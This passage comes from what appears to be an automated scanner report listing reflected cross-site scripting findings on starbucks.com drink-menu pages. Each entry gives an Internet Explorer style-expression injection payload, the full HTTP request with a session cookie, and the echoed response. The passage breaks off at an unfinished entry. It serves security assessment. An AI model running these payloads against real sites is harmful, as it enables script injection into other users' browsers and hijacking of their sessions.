This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/drinks/frappuccino-blended-beverages/pumpkin-spice-creme-frappuccino-blended-beverage?13ebb"style%3d"x%3aexpression(alert(1))"f3fa25f47de=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:35:39 GMT Connection: close Content-Length: 45020
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/pumpkin-spice-creme-frappuccino-blended-beverage?13ebb"style="x:expression(alert(1))"f3fa25f47de=1"/> ...[SNIP]...
1.774. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/pumpkin-spice-frappuccino-blended-beverage [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2a77"style%3d"x%3aexpression(alert(1))"08cacbe5b0f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b2a77"style="x:expression(alert(1))"08cacbe5b0f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/drinks/frappuccino-blended-beverages/pumpkin-spice-frappuccino-blended-beverage?b2a77"style%3d"x%3aexpression(alert(1))"08cacbe5b0f=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:35:40 GMT Connection: close Content-Length: 45296
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/pumpkin-spice-frappuccino-blended-beverage?b2a77"style="x:expression(alert(1))"08cacbe5b0f=1"/> ...[SNIP]...
1.775. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/pumpkin-spice-frappuccino-light-blended-beverage [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98e6e"style%3d"x%3aexpression(alert(1))"257fad08362 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 98e6e"style="x:expression(alert(1))"257fad08362 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/drinks/frappuccino-blended-beverages/pumpkin-spice-frappuccino-light-blended-beverage?98e6e"style%3d"x%3aexpression(alert(1))"257fad08362=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:35:37 GMT Connection: close Content-Length: 43317
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/pumpkin-spice-frappuccino-light-blended-beverage?98e6e"style="x:expression(alert(1))"257fad08362=1"/> ...[SNIP]...
1.776. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/soy-strawberries-and-creme-frappuccino-blended-beverage [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e66f5"style%3d"x%3aexpression(alert(1))"08de845d79f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e66f5"style="x:expression(alert(1))"08de845d79f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/drinks/frappuccino-blended-beverages/soy-strawberries-and-creme-frappuccino-blended-beverage?e66f5"style%3d"x%3aexpression(alert(1))"08de845d79f=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:35:46 GMT Connection: close Content-Length: 44708
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/soy-strawberries-and-creme-frappuccino-blended-beverage?e66f5"style="x:expression(alert(1))"08de845d79f=1"/> ...[SNIP]...
1.777. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/strawberries-and-creme-frappuccino-blended-creme [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ca72"style%3d"x%3aexpression(alert(1))"9fca5104888 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6ca72"style="x:expression(alert(1))"9fca5104888 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/drinks/frappuccino-blended-beverages/strawberries-and-creme-frappuccino-blended-creme?6ca72"style%3d"x%3aexpression(alert(1))"9fca5104888=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:36:32 GMT Connection: close Content-Length: 45465
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/strawberries-and-creme-frappuccino-blended-creme?6ca72"style="x:expression(alert(1))"9fca5104888=1"/> ...[SNIP]...
1.778. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/toffee-mocha-frappuccino-blended-beverage [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e85c"style%3d"x%3aexpression(alert(1))"331368f0807 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4e85c"style="x:expression(alert(1))"331368f0807 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/drinks/frappuccino-blended-beverages/toffee-mocha-frappuccino-blended-beverage?4e85c"style%3d"x%3aexpression(alert(1))"331368f0807=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:37:03 GMT Connection: close Content-Length: 45253
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/toffee-mocha-frappuccino-blended-beverage?4e85c"style="x:expression(alert(1))"331368f0807=1"/> ...[SNIP]...
1.779. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/toffee-mocha-frappuccino-light-blended-beverage [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b41a"style%3d"x%3aexpression(alert(1))"7c9d6c61240 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5b41a"style="x:expression(alert(1))"7c9d6c61240 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/drinks/frappuccino-blended-beverages/toffee-mocha-frappuccino-light-blended-beverage?5b41a"style%3d"x%3aexpression(alert(1))"7c9d6c61240=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:36:43 GMT Connection: close Content-Length: 45282
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/toffee-mocha-frappuccino-light-blended-beverage?5b41a"style="x:expression(alert(1))"7c9d6c61240=1"/> ...[SNIP]...
1.780. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/vanilla-bean-frappuccino-blended-creme [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a8c8"style%3d"x%3aexpression(alert(1))"fd9920fedb7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1a8c8"style="x:expression(alert(1))"fd9920fedb7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/drinks/frappuccino-blended-beverages/vanilla-bean-frappuccino-blended-creme?1a8c8"style%3d"x%3aexpression(alert(1))"fd9920fedb7=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:36:59 GMT Connection: close Content-Length: 45430
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/vanilla-bean-frappuccino-blended-creme?1a8c8"style="x:expression(alert(1))"fd9920fedb7=1"/> ...[SNIP]...
1.781. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/white-chocolate-frappuccino-blended-creme [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5ef7"style%3d"x%3aexpression(alert(1))"69f7e0c5087 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b5ef7"style="x:expression(alert(1))"69f7e0c5087 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/drinks/frappuccino-blended-beverages/white-chocolate-frappuccino-blended-creme?b5ef7"style%3d"x%3aexpression(alert(1))"69f7e0c5087=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:37:13 GMT Connection: close Content-Length: 45272
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/white-chocolate-frappuccino-blended-creme?b5ef7"style="x:expression(alert(1))"69f7e0c5087=1"/> ...[SNIP]...
1.782. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/white-chocolate-mocha-frappuccino-blended-coffee [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf9f7"style%3d"x%3aexpression(alert(1))"70fdedd5bf5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bf9f7"style="x:expression(alert(1))"70fdedd5bf5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/drinks/frappuccino-blended-beverages/white-chocolate-mocha-frappuccino-blended-coffee?bf9f7"style%3d"x%3aexpression(alert(1))"70fdedd5bf5=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:36:59 GMT Connection: close Content-Length: 45570
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/white-chocolate-mocha-frappuccino-blended-coffee?bf9f7"style="x:expression(alert(1))"70fdedd5bf5=1"/> ...[SNIP]...
1.783. http://www.starbucks.com/menu/drinks/kids-drinks-and-other/caramel-apple-spice [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb864"style%3d"x%3aexpression(alert(1))"66df403bea2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as eb864"style="x:expression(alert(1))"66df403bea2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/drinks/kids-drinks-and-other/caramel-apple-spice?eb864"style%3d"x%3aexpression(alert(1))"66df403bea2=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:37:34 GMT Connection: close Content-Length: 41154
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks/kids-drinks-and-other/caramel-apple-spice?eb864"style="x:expression(alert(1))"66df403bea2=1"/> ...[SNIP]...
1.784. http://www.starbucks.com/menu/drinks/kids-drinks-and-other/cold-apple-juice [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 563c7"style%3d"x%3aexpression(alert(1))"b209836fbc5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 563c7"style="x:expression(alert(1))"b209836fbc5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/drinks/kids-drinks-and-other/cold-apple-juice?563c7"style%3d"x%3aexpression(alert(1))"b209836fbc5=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:37:36 GMT Connection: close Content-Length: 40523
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks/kids-drinks-and-other/cold-apple-juice?563c7"style="x:expression(alert(1))"b209836fbc5=1"/> ...[SNIP]...
1.785. http://www.starbucks.com/menu/drinks/kids-drinks-and-other/flavored-steamed-milk [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ee49"style%3d"x%3aexpression(alert(1))"6f89d6acc18 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5ee49"style="x:expression(alert(1))"6f89d6acc18 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/drinks/kids-drinks-and-other/flavored-steamed-milk?5ee49"style%3d"x%3aexpression(alert(1))"6f89d6acc18=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:37:25 GMT Connection: close Content-Length: 41188
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks/kids-drinks-and-other/flavored-steamed-milk?5ee49"style="x:expression(alert(1))"6f89d6acc18=1"/> ...[SNIP]...
1.786. http://www.starbucks.com/menu/drinks/kids-drinks-and-other/milk [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/drinks/kids-drinks-and-other/milk
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28684"style%3d"x%3aexpression(alert(1))"1f8573fecb9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 28684"style="x:expression(alert(1))"1f8573fecb9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/drinks/kids-drinks-and-other/milk?28684"style%3d"x%3aexpression(alert(1))"1f8573fecb9=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:38:11 GMT Connection: close Content-Length: 40785
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks/kids-drinks-and-other/milk?28684"style="x:expression(alert(1))"1f8573fecb9=1"/> ...[SNIP]...
1.787. http://www.starbucks.com/menu/drinks/kids-drinks-and-other/steamed-apple-juice [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39769"style%3d"x%3aexpression(alert(1))"720efc59f16 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 39769"style="x:expression(alert(1))"720efc59f16 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/drinks/kids-drinks-and-other/steamed-apple-juice?39769"style%3d"x%3aexpression(alert(1))"720efc59f16=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
